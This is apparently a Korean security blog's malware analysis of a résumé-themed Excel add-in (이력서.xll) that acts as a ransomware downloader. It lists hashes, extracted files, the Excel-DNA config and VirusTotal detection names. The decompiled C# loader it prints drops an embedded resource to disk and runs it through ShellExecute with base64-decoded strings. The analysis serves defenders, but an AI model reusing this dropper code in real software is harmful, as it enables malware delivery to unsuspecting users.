꿈을꾸는 파랑새

오늘은 XLL 파일로 유포 중인 이력서(.) xll에 대해 글을 적어 보겠습니다. 해당 악성코드는 겉으로 보면 엑셀로 제작된 이력서로 보이지만 실제로는 랜섬웨어를 감염시키기 위해 제작된 악성코드입니다.엑셀의 Add-in(추가 기능) 파일로 MS Excel을 통해 파일을 실행할 수가 있으며 XLL 파일은 실행파일인 PE(Portable Executable) 파일의 DLL 외형을 가지고 있으며 Microsoft Excel(엑셀)을 통해 실행되며 해당 악성코드인 이력서(.)Xll 을 실행을 하며 다음과 같은 화면을 볼 수가 있습니다.
이 세션에서만 이 추가 기능을 사용합니다. 라는 것이 보일 것인데 해당 기능을 통해서 악의적인 목적이 있는 사람이 만들어 놓은 대로 악의적인 행위를 실행합니다.
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:이력서(.)xll
사이즈:920 KB
CRC32:5271f483
MD5:9011870a33ddb12f8934f9061de6f42c
SHA-1:f4ed234105177810353926f58f748be67c2be4ed
SHA-256:7a093ce5d20195bf4c127ae8999ccbbdb99555145c8687df6806753e209709b1
SHA-512:6c037db847e05d620a05628c9e7058f90ce5b23414b6038a6f96a7df22ee66732ace237e0534a20d080e265725846f1dec2123a207a060c52730cea5d82c0048

악성코드 이력서.xll 실행
악성코드 이력서.xll 실행

엑셀을 통해 실행되나 DLL의 구조 형식을 가졌으며, Export 함수에 xlAutoOpen을 포함 하고 있으며 xlAutoOpen 함수는 모든 X LL 파일에서 구현되어야 하는 필수 콜백함수로 기본적으로 해당 함수를 포함하고 있으며 이력서.xll 은 알려진 Excel-DNA라는 오픈소스를 통해 컴파일돼 있으며 Resource 영역에 압축된 형태로 실제적인 악성 기능을 하는.net 형태의 악성 DLL을 가지고 있습니다.

쉽게 확인을 하려고 Cerbero Suite Advanced 를 통해서 보면 쉽게 확인을 할 수가 있습니다.
이력서.xll 에서 추출한.net 파일명은 ZFD06.dll으로, Resource 영역에 명시된 이름과 동일 하게 제작이 돼 있으며 Excel-DNA Unpack 시 확인되는 __MAIN__.dna XML 파일에서도 확인 가능합니다.

Cerbero Suite Advanced 본 이력서.xll 파일
Cerbero Suite Advanced 본 이력서.xll 파일

먼저 해당 부분을 풀면 다음과 같은 파일들이 나오는 것을 확인할 수가 있습니다.

악성코드 Xll 파일 추출
악성코드 Xll 파일 추출

EXCELDNA.INTEGRATION.dll
EXCELDNA.LOADER.dll
EZFD06.dll

__MAIN__.dna (DNA)
그리고 내용은 다음과 같습니다.

__MAIN__.dna’ XML파일 내용
__MAIN__.dna’ XML파일 내용

<?xml version="1.0"?>
<DnaLibrary xmlns:xsi="http://www.w3(.)org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3(.)org/2001/XMLSchema" Name="zfd06" RuntimeVersion="v4.0" ShadowCopyFiles="false" DefaultReferences="true" DefaultImports="true">
  <ExternalLibrary Path="packed:ZFD06" ComServer="false" Pack="true" LoadFromBytes="true" ExplicitExports="false" ExplicitRegistration="false" UseVersionAsOutputVersion="false" />
</DnaLibrary>

그리고 dnSpy 로 해당 zf06.dll 파일 보면 다음과 같은 내용을 볼 수가 있습니다.

dnSpy 로 본 zf06.dll 화면dnSpy 로 본 zf06.dll
dnSpy 로 본 zf06.dll

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using ExcelDna.Integration;

namespace v9rd2yrzf
{
	// Token: 0x0200000C RID: 12
	public class ne1sy2 : IExcelAddIn
	{
		// Token: 0x06000039 RID: 57 RVA: 0x00003B60 File Offset: 0x00001D60
		public void writeessay(string recN, string fizxN)
		{
			using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(recN))
			{
				using (FileStream fileStream = new FileStream(fizxN, FileMode.Create, FileAccess.Write))
				{
					manifestResourceStream.CopyTo(fileStream);
				}
			}
		}

		// Token: 0x0600003A RID: 58 RVA: 0x00002363 File Offset: 0x00000563
		public void AutoClose()
		{
			throw new NotImplementedException();
		}

		// Token: 0x0600003B RID: 59
		[DllImport("Shell32.dll", CharSet = CharSet.Auto, EntryPoint = "ShellExecute", SetLastError = true)]
		private static extern IntPtr _89mX(c)NxPlDKoXKS1rgCgBsmkD0R(IntPtr, string, string, string, string, int);

		// Token: 0x0600003C RID: 60 RVA: 0x0000236A File Offset: 0x0000056A
		private static string _S0KqErCbH(J)0IK60FXwDGaWjTsQi(string A_0)
		{
			return Encoding.UTF8.GetString(Convert.FromBase64String(A_0));
		}

		// Token: 0x0600003D RID: 61 RVA: 0x0000237C File Offset: 0x0000057C
		private static bool _5ZgpYRhqdNIdYdP5zXhnuclW4Lh(string A_0)
		{
			ne1sy2(.)_89mXcNxPlDKoXKS1rgCgBsmkD0R((IntPtr)0, <Module>.(\)u202E\u206C\u200C\u206A\u206E\u200F\u202D\u206E\u206B\u206F\u202C\u202D(\)u200D\u202B\u206E\u206F\u200F\u202B\u200F\u200F(\)u206C\u206D\u206E\u202A\u206E\u206D\u200D(\)u200B\u206E\u206B\u202A\u206D\u202E\u206A\u206C\u202B\u200B\u206B\u202B\u206B\u202E<string>(4221712190U), A_0, "", "", 0);
			return true;

해당 DLL 기능을 이용해서 powershell을 통해 추가 악성코드를 다운로드를 시도를 하면 현재는 악성코드가 연결되지 않습니다. 그러나 부활을 할 수가 있기 때문에 주의가 필요하지 않을까 생각을 합니다.
VirusTotal(바이러스토탈)2022-11-30 11:46:22 UTC 기준 탐지되는 보안 업체들은 다음과 같습니다.
Ad-Aware:Trojan.GenericKD.63855678
AhnLab-V3:Downloader/Win.Agent.C5313333
Alibaba:Trojan:MSIL/Leonem.354c7511
ALYac:Trojan.Downloader.942080
Arcabit:Trojan.Generic.D3CE5C3E
Avast:Win32:DropperX-gen [Drp]
AVG:Win32:DropperX-gen [Drp]
Avira (no cloud):TR/Dldr.Agent.ebenu
BitDefender:Trojan.GenericKD.63855678
Cylance:Unsafe
Cynet:Malicious (score: 100)
Emsisoft:Trojan.GenericKD.63855678 (B)
eScan:Trojan.GenericKD.63855678
ESET-NOD32:A Variant Of MSIL/TrojanDownloader.Agent.OEB
F-Secure:Trojan.TR/Dldr.Agent.ebenu
Fortinet:Malicious_Behavior.SB
GData:Trojan.GenericKD.63855678
Google:Detected
Ikarus:Trojan-Downloader.MSIL.Agent
K7AntiVirus:Trojan-Downloader ( 0059bc281 )
MAX:Malware (ai Score=100)
MaxSecure:Trojan.Malware.194005762.susgen
McAfee:Artemis!9011870A33DD
McAfee-GW-Edition:RDN/Generic Downloader.x
Microsoft:Trojan:Win32/Leonem
Panda:Trj/CI.A
Rising:Downloader.Agent!8.B23 (CLOUD)
Sangfor Engine Zero:Downloader.Win32.Leonem.V00f
Sophos:Mal/Generic-S
Symantec:Trojan Horse
Tencent:Msil.Trojan-Downloader.Ader.Xtjl
Trellix (FireEye):Trojan.GenericKD.63855678
TrendMicro:TROJ_GEN.R002C0DKQ22
TrendMicro-HouseCall"TROJ_GEN.R002C0DKQ22
VIPRE:Trojan.GenericKD.63855678
Zillya:Dropper.Agent.Win32.461852
기본적으로 모르는 메일이나 파일들은 실행을 시키지 않는 것이 중요하겠지만, 기본적으로 백신 프로그램은 설치해서 사용하시는 것이 안전하게 컴퓨터를 사용하는 방법일 것입니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band